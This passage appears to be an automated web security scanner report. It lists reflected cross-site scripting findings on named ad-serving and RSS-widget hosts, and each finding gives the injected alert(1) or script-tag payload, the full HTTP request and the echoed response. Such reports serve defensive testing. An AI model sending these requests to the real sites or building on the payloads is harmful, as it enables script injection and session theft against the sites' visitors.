Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1185:dd578"-alert(1)-"a6a3f2f621b,2849e%22%3b63eaba2bfcf,2849e";expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1185,589,14:1185,589,0:0,589,14:305,825,15400f7829e448bcadddbc6079;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=4:31:31:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "4368e0d-8952-4aa4dfbf231c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=145
Expires: Sun, 04 Sep 2011 02:34:38 GMT
Date: Sun, 04 Sep 2011 02:32:13 GMT
Content-Length: 4657
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=76;var zzPat='dd578"-alert(1)-"a6a3f2f621b,2849e%22%3b63eaba2bfcf,2849e"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=dd578"-alert(1)-"a6a3f2f621b,2849e%22%3b63eaba2bfcf,2849e";z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;

...[SNIP]...

6.105. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-504/d8/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d416'-alert(1)-'40b5877820a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-504/d8/jsc/fm.js?2d416'-alert(1)-'40b5877820a=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 958
Content-Type: application/x-javascript
Set-Cookie: FFad=16:28:0:0:0:0:0:47:1:1:0:1]]>>:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:767,4,94:826,471,9:767,4,9:767,4,41:933,56,15:826,471,14:767,4,14:305,825,15:305,825,0:0,825,15:305,0,15:0,0,0]]>>;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "4368e0d-8952-4aa4dfbf231c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=222
Expires: Sun, 04 Sep 2011 04:18:20 GMT
Date: Sun, 04 Sep 2011 04:14:38 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

y10.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-504/d8;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-504/d8/jsc/fm.js;qs=2d416'-alert(1)-'40b5877820a=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.
...[SNIP]...

6.106. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-504/d8/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7f5c'%3balert(1)//7d7a8394a95 was submitted in the q parameter. This input was echoed as b7f5c';alert(1)//7d7a8394a95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-504/d8/jsc/fm.js?c=589/122/121&a=0&f=&n=1185&r=13&d=14&q=b7f5c'%3balert(1)//7d7a8394a95&$=&s=76&z=0.1346084768883884 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1185:5da07'-alert(1)-'6ad983039ac,baeb2%27%3bb36ac29226,baeb2';expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1185,589,14:1185,589,0:0,589,14:305,825,15400f7829e448bcadddbc6079;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=78:31:31:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "4368e0d-8952-4aa4dfbf231c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=147
Expires: Sun, 04 Sep 2011 02:34:38 GMT
Date: Sun, 04 Sep 2011 02:32:11 GMT
Content-Length: 4697
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=76;var zzPat='b7f5c';alert(1)//7d7a8394a95,5da07'-alert(1)-'6ad983039ac,baeb2%27%3bb36ac29226,baeb2'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=b7f5c';alert(1)//7d7a8394a95,5da07'-alert(1)-'6ad983039ac,baeb2%2
...[SNIP]...

6.107. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_css_url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feed.mikle.com
Path:	/feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b5e2d'><script>alert(1)</script>2baa6b3dd54 was submitted in the rssmikle_css_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=b5e2d'><script>alert(1)</script>2baa6b3dd54&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<link rel='stylesheet' type='text/css' href='b5e2d'><script>alert(1)</script>2baa6b3dd54' />
...[SNIP]...

6.108. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_font_size parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feed.mikle.com
Path:	/feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_font_size request parameter is copied into the HTML document as plain text between tags. The payload 4bf24<script>alert(1)</script>69e64f94276 was submitted in the rssmikle_font_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=144bf24<script>alert(1)</script>69e64f94276&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<style type='text/css'>
body{margin:0;padding:0;}
#container{overflow:hidden;margin:0;padding:0;width:325px;height:200px;font-size:144bf24<script>alert(1)</script>69e64f94276px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFF;background-color:#2561BA;background-image:url(http://);}
#header .feed_title{margin:0;
...[SNIP]...

6.109. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_frame_height parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feed.mikle.com
Path:	/feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_frame_height request parameter is copied into the HTML document as plain text between tags. The payload feabe<script>alert(1)</script>d3c548e0b85 was submitted in the rssmikle_frame_height parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200feabe<script>alert(1)</script>d3c548e0b85&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<style type='text/css'>
body{margin:0;padding:0;}
#container{overflow:hidden;margin:0;padding:0;width:325px;height:200feabe<script>alert(1)</script>d3c548e0b85px;font-size:14px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFF;background-color:#2561BA;background-image:url(http://);}
#header .feed_
...[SNIP]...

6.110. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_frame_width parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feed.mikle.com
Path:	/feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_frame_width request parameter is copied into the HTML document as plain text between tags. The payload 64ad0<script>alert(1)</script>1d270771969 was submitted in the rssmikle_frame_width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=32564ad0<script>alert(1)</script>1d270771969&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<style type='text/css'>
body{margin:0;padding:0;}
#container{overflow:hidden;margin:0;padding:0;width:32564ad0<script>alert(1)</script>1d270771969px;height:200px;font-size:14px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFF;background-color:#2561BA;background-image:url(http://);}
#
...[SNIP]...

6.111. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_bgcolor parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feed.mikle.com
Path:	/feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_bgcolor request parameter is copied into the HTML document as plain text between tags. The payload bff5f<script>alert(1)</script>0d9a5f4cd41 was submitted in the rssmikle_item_bgcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFFbff5f<script>alert(1)</script>0d9a5f4cd41&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
or:#FFFFFF;text-decoration:underline;}
#header .feed_title a:active{color:#FFFFFF;text-decoration:none;}
#content{margin:0px;padding:5px 0px 0px 0px;background-color:#FFFFFFbff5f<script>alert(1)</script>0d9a5f4cd41;background-image:url(http://);}
#content .feed_item{margin:0 0 7px 0;padding:0 0 7px 0;border-bottom:1px dashed #CCCCCC;}
#content .feed_item_title{margin:1px 0 1px 3px;pad
...[SNIP]...

6.112. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_bgcolor parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feed.mikle.com
Path:	/feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_bgcolor request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ccbf'%3balert(1)//88177ed0805 was submitted in the rssmikle_item_bgcolor parameter. This input was echoed as 5ccbf';alert(1)//88177ed0805 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF5ccbf'%3balert(1)//88177ed0805&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

6.113. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_bgimage parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feed.mikle.com
Path:	/feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_bgimage request parameter is copied into the HTML document as plain text between tags. The payload 10e16<script>alert(1)</script>eba7c1243f0 was submitted in the rssmikle_item_bgimage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F10e16<script>alert(1)</script>eba7c1243f0&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
derline;}
#header .feed_title a:active{color:#FFFFFF;text-decoration:none;}
#content{margin:0px;padding:5px 0px 0px 0px;background-color:#FFFFFF;background-image:url(http://10e16<script>alert(1)</script>eba7c1243f0);}
#content .feed_item{margin:0 0 7px 0;padding:0 0 7px 0;border-bottom:1px dashed #CCCCCC;}
#content .feed_item_title{margin:1px 0 1px 3px;padding:1px 2px 1px 3px;color:#2
...[SNIP]...

6.114. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_description_color parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feed.mikle.com
Path:	/feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_description_color request parameter is copied into the HTML document as plain text between tags. The payload 5ed3e<script>alert(1)</script>3e11fc0155b was submitted in the rssmikle_item_description_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%236666665ed3e<script>alert(1)</script>3e11fc0155b&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
A3;text-decoration:none;}
#content .feed_item_podcast{margin:0 0 0 3px;padding:0 0 0 3px;}
#content .feed_item_description{margin:0 0 0 3px;padding:0 2px 0 3px;color:#6666665ed3e<script>alert(1)</script>3e11fc0155b;line-height:135%;}
#footer{display:none;height:0px;margin:0px;padding:0px;color:#FFFFFF;background-color:#FFFFFF;background-image:url(http://);}
</style>
...[SNIP]...

6.115. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_podcast parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feed.mikle.com
Path:	/feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_podcast request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccc5a'%3balert(1)//b618cdd9d71 was submitted in the rssmikle_item_podcast parameter. This input was echoed as ccc5a';alert(1)//b618cdd9d71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=iconccc5a'%3balert(1)//b618cdd9d71 HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
